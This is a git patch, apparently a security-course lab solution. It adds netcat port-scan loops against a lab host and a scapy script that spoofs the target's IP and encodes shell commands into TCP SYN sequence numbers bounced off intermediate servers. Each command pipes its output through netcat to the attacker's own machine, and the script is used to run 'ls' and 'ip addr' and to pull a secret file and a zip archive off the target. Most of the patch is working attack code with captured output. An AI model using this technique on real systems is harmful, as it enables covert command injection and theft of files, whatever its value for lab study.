From e93aa50de29936d9d099abaa8d68e472abcb33f1 Mon Sep 17 00:00:00 2001 From: David Kaufmann Date: Fri, 18 Dec 2015 17:21:15 +0100 Subject: [PATCH] solve exercise3 --- exercise3.tex | 10 +++++ exercise3/New Text Documnet.txt.zip | Bin 0 -> 381 bytes exercise3/generator.py | 64 ++++++++++++++++++++++++++++ 3 files changed, 74 insertions(+) create mode 100644 exercise3.tex create mode 100644 exercise3/New Text Documnet.txt.zip create mode 100755 exercise3/generator.py diff --git a/exercise3.tex b/exercise3.tex new file mode 100644 index 0000000..9df2fee --- /dev/null +++ b/exercise3.tex @@ -0,0 +1,10 @@ +\section{Rep:3.a} + +scan the host + +for i in `seq 1 1000`; do echo "test" | nc -w1 192.168.67.115 \$i \& ; done +for i in `seq 1 1000`; do echo "test" | nc -u -w1 192.168.67.115 \$i \& ; done + + + +\section{Rep:3.b} diff --git a/exercise3/New Text Documnet.txt.zip b/exercise3/New Text Documnet.txt.zip new file mode 100644 index 0000000000000000000000000000000000000000..d676887e204f7667a1ed62c41225b92236f299d2 GIT binary patch literal 381 zcmWIWW@Zs#U|`^2P@3E29(CdEiM>Fc0wV*1D1!`xUuwBRNNPoif=hmKX>Mv>iC#%X zNoWWs1GB^N%rFoxt>9*0WO>2NzyKypdk=CQG7xZi|6BC&Nv>-R0scxI6(adnoX5P9 zbv?o^eNnhpw|lmTxYIXYxM-PnJ+8Xw`7>e8dbjnxW}D_MzSn)aBf2XjX6s1*hW_EBo%w&aOj;4^7M6aPQjJmW=4oh;?0y93EtRe)6`vwj<&; zLz$R)SuA%|;p0P(*aN&7ndF#pg@yz$To@RD0mHDQ5yZj~Hms1aK?|1vZ&o&tCPpBP K2GTqra~J>|@P>;3 literal 0 HcmV?d00001 diff --git a/exercise3/generator.py b/exercise3/generator.py new file mode 100755 index 0000000..f509c25 --- /dev/null +++ b/exercise3/generator.py @@ -0,0 +1,64 @@ +#!/usr/bin/env python + +# disable IPv6 error message +import logging +logging.getLogger("scapy.runtime").setLevel(logging.ERROR) +from scapy.all import * +logging.getLogger("scapy.runtime").setLevel(logging.WARN) + +#send(IP(dst='127.0.0.1')/TCP(sport=1337)) + +# our pingback target +src = '192.168.67.115' +# our intermediate syn-servers +dst = ['192.168.67.200', '192.168.67.210', '192.168.67.220'] +sport = 1337 +dport = 80 +# self +self = '192.168.67.26' +port = '1234' + +def sendchar(dst, char): + if char is not None: + ip=IP(src=src,dst=dst) + SYN=TCP(sport=sport,dport=dport,flags='S',seq=ord(char)-1) + send(ip/SYN) + +def run(cmd): + cmd += "|nc "+self+" "+port+"\r" + chunksize = 4 + chunklist = [ cmd[i:i+chunksize] for i in range(0, len(cmd), chunksize) ] + for chunkid, chunk in enumerate(chunklist): + curdst = chunkid % len(dst) + for char in chunk: + sendchar(dst[curdst], char) + +#run("ip addr") +""" + 1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default + link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 + inet 127.0.0.1/8 scope host lo + valid_lft forever preferred_lft forever + inet6 ::1/128 scope host + valid_lft forever preferred_lft forever +2: eth0: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 + link/ether 08:00:27:27:2b:f0 brd ff:ff:ff:ff:ff:ff + inet 192.168.67.115/24 brd 192.168.67.255 scope global eth0 + valid_lft forever preferred_lft forever + inet6 fe80::a00:27ff:fe27:2bf0/64 scope link + valid_lft forever preferred_lft forever +""" + +#run("pwd") +""" +/home/nsa +""" + +#run("ls") +""" +New Text Documnet.txt.zip +secret +""" + +#run("cat secret") # copy file with 'nc -l 1234 > secret' +run("cat *.zip") # copy file with 'nc -l 1234 > New\ Text\ Documnet.txt.zip' -- 2.43.0